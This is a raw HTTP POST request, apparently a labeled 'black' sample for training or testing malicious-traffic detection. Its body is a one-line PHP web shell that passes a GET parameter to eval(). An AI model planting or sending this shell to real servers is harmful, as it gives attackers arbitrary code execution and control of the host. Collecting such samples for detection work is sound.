# tag: black,php_code
POST / HTTP/1.0
Host: 100.0.0.210:9999
Connection: close
Content-Length: 96
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=C115AF370AA644036D6B9DC4B635715E
Content-Type: application/x-www-form-urlencoded

<?php
    if(isset($_GET['code'])){
    @$str=$_GET['code'];
    eval($str);
    }
    ?>